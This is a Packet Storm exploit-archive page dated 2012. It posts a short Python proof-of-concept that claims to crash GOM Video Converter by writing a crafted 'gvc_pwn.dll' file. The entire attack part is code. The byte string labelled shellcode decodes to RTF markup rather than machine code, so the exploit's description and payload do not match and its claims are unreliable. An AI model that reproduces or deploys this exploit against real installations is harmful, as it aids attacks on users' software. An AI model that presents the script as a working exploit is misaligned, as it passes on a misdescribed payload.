exploit the possibilities

GOM Video Converter Buffer Overflow

GOM Video Converter Buffer Overflow
Posted Nov 6, 2012
Authored by Ucha Gobejishvili

GOM Video Converter buffer overflow exploit that creates a malicious .dll file.

tags | exploit, overflow
MD5 | 9f2414e6736d65673d1f55e9a42880ef

GOM Video Converter Buffer Overflow

Change Mirror Download
#!/usr/bin/python
#=============================================================#
# GOM Video Converter .dll Buffer Overflow Exploit
#
# Downloaded from: http://converter.gomlab.com/eng/download/
#
# 11/06/2012
#
# Ucha Gobejishvili
#
# Tested Platform: Windows 7
#=============================================================#
import os

evilfile = "gvc_pwn.dll"
shellcode = ("\x7b\x5c\x72\x74\x46\x31\x23\x7b\x5c\x2a\x7d\x7b\x5c\x2a\x7d\x7b\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x7d\x7b\x5c\x2a\x7d\x7b\x5c\x2a\x7d\x7b\x5c\x2a\x7d\x7b\x5c\x2a\x7d\x7b\x5c\x2a\x7d\x7b\x5c\x2a\x7d\x7b\x5c\x73\x68\x70\x7b\x5c\x2a\x7d\x7b\x5c\x2a\x7d\x7b\x5c\x2a\x7d\x7b\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x7d\x7b\x5c\x2a\x7d\x7b\x5c\x2a\x5c\x73\x68\x70\x69\x6e\x73\x74\x7b\x5c\x2a\x7d\x7b\x5c\x2a\x7d\x7b\x5c\x2a\x7d\x7b\x5c\x2a\x7d\x7b\x5c\x2a\x7d\x7b\x5c\x73\x70\x7b\x5c\x2a\x7d\x7b\x5c\x2a\x7d\x7b\x5c\x2a\x7d\x7b\x5c\x2a\x7d\x7b\x5c\x2a\x7d\x7b\x5c\x2a\x7d\x7b\x5c\x2a\x7d\x7b\x5c\x2a\x7d\x7b\x5c\x2a\x7d\x7b\x5c\x2a\x7d\x7b\x5c\x2a\x7d\x7b\x5c\x2a\x5c\x67\x65\x6e\x65\x72\x61\x74\x6f\x72\x20\x4d\x73\x66\x74\x65\x64\x69\x74\x20\x35\x2e\x34\x31\x2e\x31\x35\x2e\x31\x35\x30\x37\x3b\x7d\x0b\x69\x65\x77\x6b\x69\x6e\x64\x34\x5c\x75\x63\x31\x5c\x70\x61\x72\x64\x7b\x5c\x70\x6e\x74\x65\x78\x74\x0c\x32\x27\x42\x37\x09\x61\x62\x7d\x7b\x5c\x2a\x5c\x70\x6e\x5c\x70\x6e\x6c\x76\x6c\x62\x6c\x74\x5c\x70\x6e\x66\x32\x5c\x70\x6e\x69\x6e\x64\x65\x6e\x74\x30\x7b\x5c\x70\x6e\x74\x78\x74\x62\x27\x42\x37\x7d\x7d\x0c\x69\x2d\x37\x32\x30\x5c\x6c\x69\x37\x32\x30\x5c\x71\x63\x5c\x63\x66\x31\x5c\x75\x6c\x08\x5c\x69\x0c\x30\x0c\x73\x32\x30\x20\x35\x2f\x32\x38\x2f\x32\x30\x31\x31\x5c\x63\x66\x30\x5c\x75\x6c\x6e\x6f\x6e\x65\x08\x30\x5c\x69\x30\x5c\x70\x61\x72\x5c\x63\x66\x31\x5c\x75\x6c\x08\x5c\x69\x0c\x31\x0c\x73\x34\x30\x7b\x5c\x70\x6e\x74\x65\x78\x74\x0c\x32\x27\x42\x37\x09\x61\x62\x7d\x48\x49\x20\x2e\x2e\x2e\x2e\x2e\x2e\x2e\x2e\x5c\x63\x66\x30\x5c\x75\x6c\x6e\x6f\x6e\x65\x08\x30\x5c\x69\x30\x0c\x30\x0c\x73\x32\x30\x5c\x70\x61\x72\x7b\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x7d")
crashy = open(evilfile,"w")
crashy.write(shellcode)
crashy.close()

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

August 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    10 Files
  • 2
    Aug 2nd
    8 Files
  • 3
    Aug 3rd
    2 Files
  • 4
    Aug 4th
    1 Files
  • 5
    Aug 5th
    15 Files
  • 6
    Aug 6th
    79 Files
  • 7
    Aug 7th
    16 Files
  • 8
    Aug 8th
    11 Files
  • 9
    Aug 9th
    10 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    6 Files
  • 12
    Aug 12th
    26 Files
  • 13
    Aug 13th
    15 Files
  • 14
    Aug 14th
    19 Files
  • 15
    Aug 15th
    52 Files
  • 16
    Aug 16th
    11 Files
  • 17
    Aug 17th
    1 Files
  • 18
    Aug 18th
    2 Files
  • 19
    Aug 19th
    18 Files
  • 20
    Aug 20th
    19 Files
  • 21
    Aug 21st
    17 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close